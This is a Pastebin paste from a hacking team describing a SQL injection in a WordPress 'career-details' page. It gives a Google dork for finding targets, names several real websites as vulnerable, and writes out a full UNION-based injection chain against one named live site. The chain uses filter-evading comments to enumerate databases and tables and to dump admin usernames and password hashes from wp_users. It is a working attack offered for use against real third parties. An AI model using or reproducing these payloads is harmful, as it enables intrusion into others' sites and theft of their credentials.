API tools faq
paste
Advertisement
Netikerty

Wordpress All Version career details Sql Injection

Netikerty
Dec 23rd, 2013
1,045
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.13 KB | None | 0 0
raw download clone embed print report
  1. Wordpress All Version career details Sql Injection Vulnerability
  2.  
  3. #######################################################
  4. #
  5. # [+] Exploit Title: Wordpress All Version career details Sql Injection Vulnerability
  6. # [+] Google Dork: inurl:/career-details/?jobid=
  7. # [+] Date: 10/10/2013
  8. # [+] Exploit Author: Iranian_Dark_Coders_Team
  9. # [+] Discovered By: Black.Hack3r
  10. # [+] Version: All Version
  11. # [+] Security Risk: High
  12. # [+] Platforms: php
  13. # [+] Tested on: Windows 7
  14. #
  15. #######################################################
  16. #
  17. # [+] VULNERABILITY:
  18. #
  19. #Wordpress All Version career details Sql Injection Vulnerability
  20. #
  21. #######################################################
  22. #
  23. # [+] Exploit:
  24. #
  25. #http://localhost/[path]/career-details/?jobid=3'[Sql Injection]
  26. #
  27. #######################################################
  28. #
  29. # [+] Proof:
  30. #
  31. #http://localhost/[path]/career-details/?jobid=3+order+by+4-- No Error
  32. #http://localhost/[path]/career-details/?jobid=3+order+by+5-- Error
  33. #
  34. #######################################################
  35. #
  36. # [+] Demo site:
  37. #
  38. #http://www.sheensol.com/career-details?jobid=1
  39. #http://www.stuxbot.co.uk/career-details/?jobid=3
  40. #http://www.op3global.com/career-details/?jobid=3
  41. #http://p2pdevs.com/career-details/?jobid=2
  42. #http://37.58.83.234/~geerling/en/career-details/?jobid=1
  43. #
  44. #######################################################
  45. #
  46. # [+] Discovered By : Black.Hack3r
  47. # [+] We Are : M.R.S.CO,Black.Hack3r,N3O
  48. # [+] SpTnx : Mr.Cicili,Sec4ever,D$@d_M@n,HOt0N,KurD_HaCK3R,MR.0x41,M4H4N,Security,@3is And All Members In wWw.IDC-TeaM.NeT
  49. # [+] Home : http://wWw.IDC-TeaM.NeT
  50. #
  51. #######################################################
  52.  
  53.  
  54. http://www.bolttechmannings.com/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,2,3,4--
  55. all databases :------------------------------------------------------------------------------------------------------------------------------------
  56. http://www.bolttechmannings.com/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(SCHEMA_NAME)*/)),3,4 /*!12345from*/ /*!12345INFORMATION_SCHEMa.SCHEMATA*/--
  57. ------------------------------------------------------------------------------------------------------------------------------------
  58.  
  59. currentdatabase
  60. :--------------------------------------------------------------------------------------------------
  61. http://www.bolttechmannings.com/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,database(),3,4 /*!12345from*/ wp_users--
  62. ------------------------------------------------------------------------------------------------------------------------------------
  63.  
  64.  
  65. tables for current database
  66. :------------------------------------------------------------------------------------------
  67. http://www.bolttechmannings.com/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(table_name)*/)),3,4 /*!12345from*/ /*!12345information_schema.tables*/ /*!12345where*/ /*!12345table_schema*/ =database()--
  68. ---------------------------------------------------------------------------------------------------
  69.  
  70.  
  71. columns in table wp_users
  72. : ---------------------------------------------------------------------------------
  73. http://www.bolttechmannings.com/career-details/?jobid=19 /*!12345UNION*/ /*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(COLUMN_NAME)*/)),3,4 /*!12345from*/ /*!12345information_schema.columns*/ /*!12345where*/ /*!12345table_name*/ =CHAR(119, 112, 95, 117, 115, 101, 114, 115)--
  74. -----------------------------------------------------------------------------------------------------------
  75.  
  76.  
  77. admin user & pass
  78. : --------------------------------------------------------------------------------------------
  79. http://www.bolttechmannings.com/career-details/?jobid=19 /*!12345UNION*/ /*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(ID,0x3a,user_login,0x3a,user_pass)*/)),3,4 /*!12345from*/ wp_users--
  80. -------------------------------------------------
  81.  
  82. Note: The exploit-- http://www.mondounix.com/wordpress-easy-career-openings-sql-injection/
  83.  
  84.  
  85. we converted to decimal numbers
  86.  
  87. for this you can use this site:
  88.  
  89. http://www.branah.com/ascii-converter
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!